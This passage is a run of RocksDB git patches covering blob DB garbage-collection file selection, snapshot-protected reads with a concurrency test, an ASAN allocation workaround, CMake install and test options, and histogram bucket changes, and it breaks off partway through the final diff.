deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index bbae53c0ebb..6939e73aaff 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1560,7 +1560,9 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { } } - for (auto bfile : process_files) CloseSeqWrite(bfile, false); + for (auto bfile : process_files) { + CloseSeqWrite(bfile, false); + } return std::make_pair(true, -1); } @@ -1909,7 +1911,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, // but under the asusmption that this is only called when a // file is Immutable, we can reduce the critical section bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, - uint64_t last_id, std::string* reason) { + bool is_oldest_simple_blob_file, + std::string* reason) { if (bfile->HasTTL()) { ttlrange_t ttl_range = bfile->GetTTLRange(); if (now > ttl_range.second) { @@ -1966,13 +1969,12 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, return false; } - bool ret = bfile->BlobFileNumber() == last_id; - if (ret) { - *reason = "eligible last simple blob file"; - } else { - *reason = "not eligible since not last simple blob file"; + if (is_oldest_simple_blob_file) { + *reason = "out of space and is the oldest simple blob file"; + return true; } - return ret; + *reason = "out of space but is not the oldest simple blob file"; + return false; } std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { @@ -2096,31 +2098,27 @@ std::pair BlobDBImpl::CallbackEvicts( } void BlobDBImpl::CopyBlobFiles( - std::vector>* bfiles_copy, uint64_t* last_id) { + std::vector>* bfiles_copy) { ReadLock rl(&mutex_); // take a copy bfiles_copy->reserve(blob_files_.size()); - for (auto const& ent : blob_files_) { - bfiles_copy->push_back(ent.second); - - // A. has ttl is immutable, once set, hence no locks required - // B. blob files are sorted based on number(i.e.
index of creation ) - // so we will return the last blob file - if (!ent.second->HasTTL()) *last_id = ent.second->BlobFileNumber(); + for (auto const& p : blob_files_) { + bfiles_copy->push_back(p.second); } } void BlobDBImpl::FilterSubsetOfFiles( const std::vector>& blob_files, std::vector>* to_process, uint64_t epoch, - uint64_t last_id, size_t files_to_collect) { + size_t files_to_collect) { // 100.0 / 15.0 = 7 uint64_t next_epoch_increment = static_cast( std::ceil(100 / static_cast(kGCFilePercentage))); uint64_t now = EpochNow(); size_t files_processed = 0; + bool simple_blob_file_found = false; for (auto bfile : blob_files) { if (files_processed >= files_to_collect) break; // if this is the first time processing the file @@ -2140,8 +2138,15 @@ void BlobDBImpl::FilterSubsetOfFiles( // then it should not be GC'd if (bfile->Obsolete() || !bfile->Immutable()) continue; + bool is_oldest_simple_blob_file = false; + if (!simple_blob_file_found && !bfile->HasTTL()) { + is_oldest_simple_blob_file = true; + simple_blob_file_found = true; + } + std::string reason; - bool shouldgc = ShouldGCFile(bfile, now, last_id, &reason); + bool shouldgc = + ShouldGCFile(bfile, now, is_oldest_simple_blob_file, &reason); if (!shouldgc) { ROCKS_LOG_DEBUG(db_options_.info_log, "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 @@ -2165,11 +2170,8 @@ std::pair BlobDBImpl::RunGC(bool aborted) { current_epoch_++; - // collect the ID of the last regular file, in case we need to GC it. - uint64_t last_id = std::numeric_limits::max(); - std::vector> blob_files; - CopyBlobFiles(&blob_files, &last_id); + CopyBlobFiles(&blob_files); if (!blob_files.size()) return std::make_pair(true, -1); @@ -2178,7 +2180,7 @@ std::pair BlobDBImpl::RunGC(bool aborted) { size_t files_to_collect = (kGCFilePercentage * blob_files.size()) / 100; std::vector> to_process; - FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, last_id, + FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, files_to_collect); // in this collect the set of files, which became obsolete @@ -2288,6 +2290,16 @@ std::vector> BlobDBImpl::TEST_GetBlobFiles() const { return blob_files; } +std::vector> BlobDBImpl::TEST_GetObsoleteFiles() + const { + ReadLock l(&mutex_); + std::vector> obsolete_files; + for (auto& bfile : obsolete_files_) { + obsolete_files.emplace_back(bfile); + } + return obsolete_files; +} + void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { CloseSeqWrite(bfile, false /*abort*/); } @@ -2296,6 +2308,8 @@ Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, GCStats* gc_stats) { return GCFileAndUpdateLSM(bfile, gc_stats); } + +void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); } #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 6247fa22b79..0808349520e 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -261,10 +261,14 @@ class BlobDBImpl : public BlobDB { std::vector> TEST_GetBlobFiles() const; + std::vector> TEST_GetObsoleteFiles() const; + void TEST_CloseBlobFile(std::shared_ptr& bfile); Status TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, GCStats* gc_stats); + + void TEST_RunGC(); #endif // !NDEBUG private: @@ -291,7 +295,7 @@ class BlobDBImpl : public BlobDB { // tt - current time // last_id - the id of the non-TTL file to evict bool ShouldGCFile(std::shared_ptr bfile, uint64_t now, - uint64_t last_id, std::string* reason); + bool is_oldest_simple_blob_file, std::string* reason); // 
collect all the blob log files from the blob directory Status GetAllLogFiles(std::set>* file_nums); @@ -403,13 +407,12 @@ class BlobDBImpl : public BlobDB { bool FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, uint64_t blob_offset, uint64_t blob_size); - void CopyBlobFiles(std::vector>* bfiles_copy, - uint64_t* last_id); + void CopyBlobFiles(std::vector>* bfiles_copy); void FilterSubsetOfFiles( const std::vector>& blob_files, std::vector>* to_process, uint64_t epoch, - uint64_t last_id, size_t files_to_collect); + size_t files_to_collect); uint64_t EpochNow() { return env_->NowMicros() / 1000000; } @@ -445,7 +448,7 @@ class BlobDBImpl : public BlobDB { // Read Write Mutex, which protects all the data structures // HEAVILY TRAFFICKED - port::RWMutex mutex_; + mutable port::RWMutex mutex_; // Writers has to hold write_mutex_ before writing. mutable port::Mutex write_mutex_; @@ -454,7 +457,7 @@ std::atomic next_file_number_; // entire metadata of all the BLOB files memory - std::unordered_map> blob_files_; + std::map> blob_files_; // epoch or version of the open files. std::atomic epoch_of_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index be42c395b9d..4b742157ea7 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -688,6 +688,41 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { VerifyDB({{"foo", "v2"}}); } +TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { + // Use mock env to stop wall clock. + Options options; + options.env = mock_env_.get(); + BlobDBOptions bdb_options; + bdb_options.blob_dir_size = 100; + bdb_options.blob_file_size = 100; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + std::string value(100, 'v'); + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key_with_ttl", value, 60)); + for (int i = 0; i < 10; i++) { + ASSERT_OK(blob_db_->Put(WriteOptions(), "key" + ToString(i), value)); + } + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(11, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + ASSERT_TRUE(blob_files[0]->Immutable()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + for (int i = 1; i <= 10; i++) { + ASSERT_FALSE(blob_files[i]->HasTTL()); + if (i < 10) { + ASSERT_TRUE(blob_files[i]->Immutable()); + } + } + blob_db_impl->TEST_RunGC(); + // The oldest simple blob file (i.e. blob_files[1]) has been selected for GC. + auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + ASSERT_EQ(1, obsolete_files.size()); + ASSERT_EQ(blob_files[1]->BlobFileNumber(), + obsolete_files[0]->BlobFileNumber()); +} + } // namespace blob_db } // namespace rocksdb From 5b68b114f1038180f1ead4b8abd45fa1d92ffa30 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Sun, 20 Aug 2017 18:12:38 -0700 Subject: [PATCH 134/205] Blob db create a snapshot before every read Summary: If GC kicks in between (1) a Get() reading the index entry from the base db and (2) the Get() reading from the blob file, then the GC can delete the corresponding blob file, making the key not found. Fortunately we have existing logic to avoid deleting a blob file if it is referenced by a snapshot. So the fix is to explicitly create a snapshot before reading the index entry from the base db.
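A minimal sketch of the pattern the fix applies internally, written here against the public DB API with illustrative names:

    const rocksdb::Snapshot* snap = db->GetSnapshot();
    rocksdb::ReadOptions ro;
    ro.snapshot = snap;  // blob files referenced by this snapshot are not deleted
    std::string value;
    rocksdb::Status s = db->Get(ro, "key", &value);  // index entry, then blob
    db->ReleaseSnapshot(snap);  // release only after the blob has been read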
Closes https://github.com/facebook/rocksdb/pull/2754 Differential Revision: D5655956 Pulled By: yiwu-arbug fbshipit-source-id: e4ccbc51331362542e7343175bbcbdea5830f544 --- utilities/blob_db/blob_db_impl.cc | 100 +++++++++++++++++++++--------- utilities/blob_db/blob_db_impl.h | 43 ++++++++++--- utilities/blob_db/blob_db_test.cc | 92 +++++++++++++++++++++++++++ 3 files changed, 197 insertions(+), 38 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 6939e73aaff..d787529b1da 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -305,8 +305,8 @@ void BlobDBImpl::StartBackgroundTasks() { kDeleteCheckPeriodMillisecs, std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); tqueue_.add( - kDeleteObsoletedFilesPeriodMillisecs, - std::bind(&BlobDBImpl::DeleteObsFiles, this, std::placeholders::_1)); + kDeleteObsoleteFilesPeriodMillisecs, + std::bind(&BlobDBImpl::DeleteObsoleteFiles, this, std::placeholders::_1)); tqueue_.add(kSanityCheckPeriodMillisecs, std::bind(&BlobDBImpl::SanityCheck, this, std::placeholders::_1)); tqueue_.add(kWriteAmplificationStatsPeriodMillisecs, @@ -1117,15 +1117,25 @@ Status BlobDBImpl::AppendSN(const std::shared_ptr& bfile, } std::vector BlobDBImpl::MultiGet( - const ReadOptions& options, + const ReadOptions& read_options, const std::vector& column_family, const std::vector& keys, std::vector* values) { + // Get a snapshot to avoid blob file get deleted between we + // fetch and index entry and reading from the file. + ReadOptions ro(read_options); + bool snapshot_created = SetSnapshotIfNeeded(&ro); std::vector values_lsm; values_lsm.resize(keys.size()); - auto statuses = db_->MultiGet(options, column_family, keys, &values_lsm); + auto statuses = db_->MultiGet(ro, column_family, keys, &values_lsm); + TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:1"); + TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:2"); + values->resize(keys.size()); + assert(statuses.size() == keys.size()); for (size_t i = 0; i < keys.size(); ++i) { - if (!statuses[i].ok()) continue; + if (!statuses[i].ok()) { + continue; + } auto cfh = reinterpret_cast(column_family[i]); auto cfd = cfh->cfd(); @@ -1133,9 +1143,21 @@ std::vector BlobDBImpl::MultiGet( Status s = CommonGet(cfd, keys[i], values_lsm[i], &((*values)[i])); statuses[i] = s; } + if (snapshot_created) { + db_->ReleaseSnapshot(ro.snapshot); + } return statuses; } +bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { + assert(read_options != nullptr); + if (read_options->snapshot != nullptr) { + return false; + } + read_options->snapshot = db_->GetSnapshot(); + return true; +} + Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, const std::string& index_entry, std::string* value, SequenceNumber* sequence) { @@ -1172,11 +1194,6 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, bfile = hitr->second; } - if (bfile->Obsolete()) { - return Status::NotFound( - "Blob Not Found as blob file was garbage collected"); - } - // 0 - size if (!handle.size() && value != nullptr) { value->clear(); @@ -1274,25 +1291,30 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, return s; } -Status BlobDBImpl::Get(const ReadOptions& options, +Status BlobDBImpl::Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) { auto cfh = reinterpret_cast(column_family); auto cfd = cfh->cfd(); + // Get a snapshot to 
avoid blob file get deleted between we + // fetch and index entry and reading from the file. + // TODO(yiwu): For Get() retry if file not found would be a simpler strategy. + ReadOptions ro(read_options); + bool snapshot_created = SetSnapshotIfNeeded(&ro); + Status s; std::string index_entry; - s = db_->Get(options, column_family, key, &index_entry); - if (!s.ok()) { - if (debug_level_ >= 3) - ROCKS_LOG_WARN(db_options_.info_log, - "Get Failed on LSM KEY: %s status: '%s'", - key.ToString().c_str(), s.ToString().c_str()); - return s; + s = db_->Get(ro, column_family, key, &index_entry); + TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); + TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); + if (s.ok()) { + s = CommonGet(cfd, key, index_entry, value->GetSelf()); + value->PinSelf(); + } + if (snapshot_created) { + db_->ReleaseSnapshot(ro.snapshot); } - - s = CommonGet(cfd, key, index_entry, value->GetSelf()); - value->PinSelf(); return s; } @@ -1302,6 +1324,8 @@ Slice BlobDBIterator::value() const { auto cfh = reinterpret_cast(cfh_); auto cfd = cfh->cfd(); + TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:1"); + TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:2"); Status s = db_impl_->CommonGet(cfd, iter_->key(), index_entry.ToString(false), &vpart_); return Slice(vpart_); @@ -1977,7 +2001,7 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, return false; } -std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { +std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { if (aborted) return std::make_pair(false, -1); { @@ -2002,6 +2026,7 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { } } + blob_files_.erase(bfile->BlobFileNumber()); Status s = env_->DeleteFile(bfile->PathName()); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, @@ -2026,7 +2051,9 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { // put files back into obsolete if for some reason, delete failed if (!tobsolete.empty()) { WriteLock wl(&mutex_); - for (auto bfile : tobsolete) obsolete_files_.push_front(bfile); + for (auto bfile : tobsolete) { + obsolete_files_.push_front(bfile); + } } return std::make_pair(!aborted, -1); @@ -2212,8 +2239,6 @@ std::pair BlobDBImpl::RunGC(bool aborted) { WriteLock wl(&mutex_); for (auto bfile : obsoletes) { bool last_file = (bfile == obsoletes.back()); - // remove from global list so writers - blob_files_.erase(bfile->BlobFileNumber()); if (!evict_cb) { bfile->SetCanBeDeleted(); @@ -2231,10 +2256,14 @@ std::pair BlobDBImpl::RunGC(bool aborted) { return std::make_pair(true, -1); } -Iterator* BlobDBImpl::NewIterator(const ReadOptions& opts, +Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options, ColumnFamilyHandle* column_family) { - return new BlobDBIterator(db_->NewIterator(opts, column_family), - column_family, this); + // Get a snapshot to avoid blob file get deleted between we + // fetch and index entry and reading from the file. 
+ ReadOptions ro(read_options); + bool snapshot_created = SetSnapshotIfNeeded(&ro); + return new BlobDBIterator(db_->NewIterator(ro, column_family), column_family, + this, snapshot_created, ro.snapshot); } Status DestroyBlobDB(const std::string& dbname, const Options& options, @@ -2283,6 +2312,7 @@ Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, } std::vector> BlobDBImpl::TEST_GetBlobFiles() const { + ReadLock l(&mutex_); std::vector> blob_files; for (auto& p : blob_files_) { blob_files.emplace_back(p.second); @@ -2300,6 +2330,10 @@ std::vector> BlobDBImpl::TEST_GetObsoleteFiles() return obsolete_files; } +void BlobDBImpl::TEST_DeleteObsoleteFiles() { + DeleteObsoleteFiles(false /*abort*/); +} + void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { CloseSeqWrite(bfile, false /*abort*/); } @@ -2310,6 +2344,16 @@ Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, } void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); } + +void BlobDBImpl::TEST_ObsoleteFile(std::shared_ptr& bfile) { + uint64_t number = bfile->BlobFileNumber(); + assert(blob_files_.count(number) > 0); + bfile->SetCanBeDeleted(); + { + WriteLock l(&mutex_); + obsolete_files_.push_back(bfile); + } +} #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 0808349520e..9886dbe5b21 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -200,7 +200,7 @@ class BlobDBImpl : public BlobDB { static constexpr uint32_t kReclaimOpenFilesPeriodMillisecs = 1 * 1000; // how often to schedule delete obs files periods - static constexpr uint32_t kDeleteObsoletedFilesPeriodMillisecs = 10 * 1000; + static constexpr uint32_t kDeleteObsoleteFilesPeriodMillisecs = 10 * 1000; // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; @@ -219,16 +219,16 @@ class BlobDBImpl : public BlobDB { const Slice& key) override; using rocksdb::StackableDB::Get; - Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, + Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; using rocksdb::StackableDB::NewIterator; - virtual Iterator* NewIterator(const ReadOptions& opts, + virtual Iterator* NewIterator(const ReadOptions& read_options, ColumnFamilyHandle* column_family) override; using rocksdb::StackableDB::MultiGet; virtual std::vector MultiGet( - const ReadOptions& options, + const ReadOptions& read_options, const std::vector& column_family, const std::vector& keys, std::vector* values) override; @@ -269,11 +269,19 @@ class BlobDBImpl : public BlobDB { GCStats* gc_stats); void TEST_RunGC(); + + void TEST_ObsoleteFile(std::shared_ptr& bfile); + + void TEST_DeleteObsoleteFiles(); #endif // !NDEBUG private: Status OpenPhase1(); + // Create a snapshot if there isn't one in read options. + // Return true if a snapshot is created. + bool SetSnapshotIfNeeded(ReadOptions* read_options); + Status CommonGet(const ColumnFamilyData* cfd, const Slice& key, const std::string& index_entry, std::string* value, SequenceNumber* sequence = nullptr); @@ -332,7 +340,7 @@ class BlobDBImpl : public BlobDB { // delete files which have been garbage collected and marked // obsolete. 
Check whether any snapshots exist which refer to // the same - std::pair DeleteObsFiles(bool aborted); + std::pair DeleteObsoleteFiles(bool aborted); // Major task to garbage collect expired and deleted blobs std::pair RunGC(bool aborted); @@ -593,7 +601,7 @@ class BlobFile { // This Read-Write mutex is per file specific and protects // all the datastructures - port::RWMutex mutex_; + mutable port::RWMutex mutex_; // time when the random access reader was last created. std::atomic last_access_; @@ -700,12 +708,23 @@ class BlobFile { class BlobDBIterator : public Iterator { public: explicit BlobDBIterator(Iterator* iter, ColumnFamilyHandle* column_family, - BlobDBImpl* impl) - : iter_(iter), cfh_(column_family), db_impl_(impl) { - assert(iter_); + BlobDBImpl* impl, bool own_snapshot, + const Snapshot* snapshot) + : iter_(iter), + cfh_(column_family), + db_impl_(impl), + own_snapshot_(own_snapshot), + snapshot_(snapshot) { + assert(iter != nullptr); + assert(snapshot != nullptr); } - ~BlobDBIterator() { delete iter_; } + ~BlobDBIterator() { + if (own_snapshot_) { + db_impl_->ReleaseSnapshot(snapshot_); + } + delete iter_; + } bool Valid() const override { return iter_->Valid(); } @@ -727,10 +746,14 @@ class BlobDBIterator : public Iterator { Status status() const override { return iter_->status(); } + // Iterator::Refresh() not supported. + private: Iterator* iter_; ColumnFamilyHandle* cfh_; BlobDBImpl* db_impl_; + bool own_snapshot_; + const Snapshot* snapshot_; mutable std::string vpart_; }; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 4b742157ea7..8ec01698aa8 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -723,6 +723,98 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { obsolete_files[0]->BlobFileNumber()); } +TEST_F(BlobDBTest, ReadWhileGC) { + // run the same test for Get(), MultiGet() and Iterator each. 
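// Each iteration below wires a SyncPoint dependency so the reader thread
// stalls right after fetching the index entry; the main thread then runs GC,
// marks the old blob file obsolete, and attempts to delete it before letting
// the reader continue, which proves the snapshot keeps the file alive.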
+ for (int i = 0; i < 3; i++) { + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + blob_db_->Put(WriteOptions(), "foo", "bar"); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + std::shared_ptr bfile = blob_files[0]; + uint64_t bfile_number = bfile->BlobFileNumber(); + blob_db_impl->TEST_CloseBlobFile(bfile); + + switch (i) { + case 0: + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::Get:AfterIndexEntryGet:1", + "BlobDBTest::ReadWhileGC:1"}, + {"BlobDBTest::ReadWhileGC:2", + "BlobDBImpl::Get:AfterIndexEntryGet:2"}}); + break; + case 1: + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::MultiGet:AfterIndexEntryGet:1", + "BlobDBTest::ReadWhileGC:1"}, + {"BlobDBTest::ReadWhileGC:2", + "BlobDBImpl::MultiGet:AfterIndexEntryGet:2"}}); + break; + case 2: + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBIterator::value:BeforeGetBlob:1", + "BlobDBTest::ReadWhileGC:1"}, + {"BlobDBTest::ReadWhileGC:2", + "BlobDBIterator::value:BeforeGetBlob:2"}}); + break; + } + SyncPoint::GetInstance()->EnableProcessing(); + + auto reader = port::Thread([this, i]() { + std::string value; + std::vector values; + std::vector statuses; + switch (i) { + case 0: + ASSERT_OK(blob_db_->Get(ReadOptions(), "foo", &value)); + ASSERT_EQ("bar", value); + break; + case 1: + statuses = blob_db_->MultiGet(ReadOptions(), {"foo"}, &values); + ASSERT_EQ(1, statuses.size()); + ASSERT_EQ(1, values.size()); + ASSERT_EQ("bar", values[0]); + break; + case 2: + // VerifyDB use iterator to scan the DB. + VerifyDB({{"foo", "bar"}}); + break; + } + }); + + TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:1"); + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); + ASSERT_EQ(1, gc_stats.blob_count); + ASSERT_EQ(1, gc_stats.num_relocate); + ASSERT_EQ(1, gc_stats.relocate_succeeded); + blob_db_impl->TEST_ObsoleteFile(blob_files[0]); + blob_db_impl->TEST_DeleteObsoleteFiles(); + // The file shouln't be deleted + blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(2, blob_files.size()); + ASSERT_EQ(bfile_number, blob_files[0]->BlobFileNumber()); + auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + ASSERT_EQ(1, obsolete_files.size()); + ASSERT_EQ(bfile_number, obsolete_files[0]->BlobFileNumber()); + TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:2"); + reader.join(); + SyncPoint::GetInstance()->DisableProcessing(); + + // The file is deleted this time + blob_db_impl->TEST_DeleteObsoleteFiles(); + blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_NE(bfile_number, blob_files[0]->BlobFileNumber()); + ASSERT_EQ(0, blob_db_impl->TEST_GetObsoleteFiles().size()); + VerifyDB({{"foo", "bar"}}); + Destroy(); + } +} + } // namespace blob_db } // namespace rocksdb From 09ac6206abf27b45e6d2cbe6f462d3c3886dfc62 Mon Sep 17 00:00:00 2001 From: Archit Mishra Date: Mon, 21 Aug 2017 12:02:17 -0700 Subject: [PATCH 135/205] Circumvent ASAN false positive Summary: Changes: * checks if ASAN mode is on, and uses malloc and free in the constructor and destructor Closes https://github.com/facebook/rocksdb/pull/2767 Differential Revision: D5671243 Pulled By: armishra fbshipit-source-id: 8e4ad0f7f163400c4effa8617d3b30134119d802 --- cache/lru_cache.cc | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index a78a52dffff..47e40233648 100644 --- 
a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -234,19 +234,35 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } void* LRUCacheShard::operator new(size_t size) { +#if __SANITIZE_ADDRESS__ + return malloc(size); +#else return port::cacheline_aligned_alloc(size); +#endif } void* LRUCacheShard::operator new[](size_t size) { +#if __SANITIZE_ADDRESS__ + return malloc(size); +#else return port::cacheline_aligned_alloc(size); +#endif } void LRUCacheShard::operator delete(void *memblock) { +#if __SANITIZE_ADDRESS__ + free(memblock); +#else port::cacheline_aligned_free(memblock); +#endif } void LRUCacheShard::operator delete[](void* memblock) { +#if __SANITIZE_ADDRESS__ + free(memblock); +#else port::cacheline_aligned_free(memblock); +#endif } void LRUCacheShard::SetCapacity(size_t capacity) { From f004307e9b5ff1bc9601bd08a93e452140f8c04e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Pawe=C5=82=20Bylica?= Date: Mon, 21 Aug 2017 14:41:11 -0700 Subject: [PATCH 136/205] CMake improvements Summary: - Allow setting custom installation prefix. - Add option to disable building tests. Closes https://github.com/facebook/rocksdb/pull/2195 Differential Revision: D5054239 Pulled By: sagar0 fbshipit-source-id: 2de6bef8b7eafed60a830e1796b262f9e6f79da0 --- CMakeLists.txt | 33 ++++++++++++++++++++++++--------- 1 file changed, 24 insertions(+), 9 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 0a28a7c43ae..715147291fc 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -635,6 +635,26 @@ else() message(STATUS "JNI library is disabled") endif() +# Installation and packaging +if(WIN32) + option(ROCKSDB_INSTALL_ON_WINDOWS "Enable install target on Windows" OFF) +endif() +if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS) + if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT) + if(${CMAKE_SYSTEM_NAME} STREQUAL "Linux") + # Change default installation prefix on Linux to /usr + set(CMAKE_INSTALL_PREFIX /usr CACHE PATH "Install path prefix, prepended onto install directories." FORCE) + endif() + endif() + + include(GNUInstallDirs) + install(TARGETS ${ROCKSDB_STATIC_LIB} COMPONENT devel ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}) + install(TARGETS ${ROCKSDB_SHARED_LIB} COMPONENT runtime DESTINATION ${CMAKE_INSTALL_LIBDIR}) + install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}) +endif() + +option(WITH_TESTS "build with tests" ON) +if(WITH_TESTS) set(TESTS cache/cache_test.cc cache/lru_cache_test.cc @@ -846,14 +866,9 @@ foreach(sourcefile ${C_TEST_EXES}) add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX}) add_dependencies(check ${exename}${ARTIFACT_SUFFIX}) endforeach(sourcefile ${C_TEST_EXES}) -add_subdirectory(tools) +endif() -# Installation and packaging for Linux -if(NOT WIN32) -install(TARGETS ${ROCKSDB_STATIC_LIB} COMPONENT devel ARCHIVE DESTINATION lib64) -install(TARGETS ${ROCKSDB_SHARED_LIB} COMPONENT runtime DESTINATION lib64) -install(DIRECTORY "${PROJECT_SOURCE_DIR}/include/rocksdb/" - COMPONENT devel - DESTINATION include/rocksdb) -set(CMAKE_INSTALL_PREFIX /usr) +option(WITH_TOOLS "build with tools" ON) +if(WITH_TOOLS) + add_subdirectory(tools) endif() From 867fe92e5e65ce501069aa22c538757acfaade34 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Mon, 21 Aug 2017 17:09:20 -0700 Subject: [PATCH 137/205] Scale histogram bucket size by constant factor Summary: The goal is to reduce the number of histogram buckets, particularly now that we print these histograms for each column family. I chose 1.5 as the factor. 
We can adjust it later to either make buckets more granular or make fewer buckets. Closes https://github.com/facebook/rocksdb/pull/2139 Differential Revision: D4872076 Pulled By: ajkr fbshipit-source-id: 87790d782a605506c3d24190a028cecbd7aa564a --- HISTORY.md | 2 ++ monitoring/histogram.cc | 53 +++++++++++++----------------------- monitoring/histogram.h | 10 +++---- monitoring/histogram_test.cc | 26 ++++++++---------- 4 files changed, 38 insertions(+), 53 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index d4478c7d3de..a40a3b8926b 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,7 @@ # Rocksdb Change Log ## Unreleased +### Public API Change +* Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints. ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 083ef75fdf4..b3c01a78e08 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -23,41 +23,26 @@ namespace rocksdb { -HistogramBucketMapper::HistogramBucketMapper() - : - // Add newer bucket index here. - // Should be always added in sorted order. - // If you change this, you also need to change - // size of array buckets_ in HistogramImpl - bucketValues_( - {1, 2, 3, 4, 5, 6, - 7, 8, 9, 10, 12, 14, - 16, 18, 20, 25, 30, 35, - 40, 45, 50, 60, 70, 80, - 